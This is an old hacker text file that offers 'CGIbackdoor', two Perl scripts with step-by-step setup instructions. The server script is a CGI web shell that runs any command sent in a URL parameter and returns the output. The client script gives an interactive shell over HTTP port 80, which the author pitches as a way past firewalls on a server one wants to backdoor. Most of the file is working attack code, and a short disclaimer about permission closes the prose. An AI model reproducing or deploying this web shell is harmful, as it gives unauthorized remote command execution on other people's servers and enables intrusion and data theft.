CGIbackdoor by hypoclear of lUSt - (Linux Users Strike Today) - 06/09/00 This file includes two PERL scripts: backdoorserver and backdoorclient This backdoor is very versitile because most firewalls do not block port 80, hence you can use this to backdoor a server on the unfortunate end of a firewall. I think a trained monkey can set this thing up, but just in case, I'll walk the newbies through the setup. To set this thing up first cut these two scripts and paste then into two different files. Then 'chmod 755' both of them so they are executable. Then put the server file into the cgi-bin directory of the server you want to backdoor (or any other directory that is web accessable and cgi scripts can execute in). Then in the client file one line needs to be edited. The line which says: my $basedir = ""; change to read: my $basedir = "/cgi-bin/webpath/to/server/program/server_program_name"; Now run the thing: usage: ./backdoorclient -h This has been tested on an IRIX 5.3 box as well as a RedHat 6.0 box. The client part seems to run on a Windows machine, however, the server as of now does not (at least on mine). Any questions, comments, concerns, and especially any bugs reports or improvements that you would like to see. Feel free to contact me by email at hypoclear@jungle.net. Please do not bug me that the files aren't working. All email of this nature will be discarded. However if a genuine bug is found, as I just said, feel free to contact me. Visit my new homepage: hypoclear.cjb.net On a final note I would like to add that I am NOT responsible for any harm done with these programs. The only servers you backdoor should be owned by you unless you have expressed permission to do so. ---start cut backdoorclient--- #!/usr/bin/perl # Backdoor over CGI Client # Coded by hypoclear of lUSt (Linux Users Strike Today) # # usage: ./backdoorclient -h use IO::Socket; use Getopt::Std; getopts('h:'); my $basedir = ""; #add full webpath here to server part, including filename my $request; my $past = ""; my $temp = ""; my $host = $opt_h; if (defined $opt_h) { while ($request ne "exit") { print "$host\$ "; $request = ; chomp ($request); $request =~ s/ /%20/g; $request =~ s/;/%3b/g; if ($request eq "exit") {print "logout\n"; last;} print "\n"; if ($request eq "cd"){$past=""} else{($temp)=split(/%20/,$request); if ($temp eq "cd") {$past=$past.$request."%3b"; $request=$past;} else{$request=$past.$request;} $request = "echo\"\"\%3b".$request;} $remote=IO::Socket::INET->new(Proto =>"tcp", PeerAddr => $host, PeerPort => "http(80)",); unless ($remote) {die "can't connect to $host"} $remote->autoflush(1); print $remote "GET $basedir?command=$request HTTP/1.0\n\n"; while (<$remote>) {unless ((/<*>/)|| (/HTTP\/1.*/)|| (/Date:*/)|| (/Server:*/)|| (/Content-type:*/)|| (/Content-Type:*/)|| (/Connection:*/)) {print}} print "\n"; -close $remote; } } else{die "\nCGI Backdoor by hypoclear\n(Linux Users Strike Today)\n usage: ./backdoorclient -h \n\n";} ---end cut backdoorclient--- ---start cut backdoorserver--- #!/usr/bin/perl use strict; use CGI qw(:standard escapeHTML); print header, start_html(""); if (param()){my $command = param("command"); $command=`$command`; print p("$command\n");} else {print start_form(); textfield("command");} print end_html; ---end cut backdoorserver---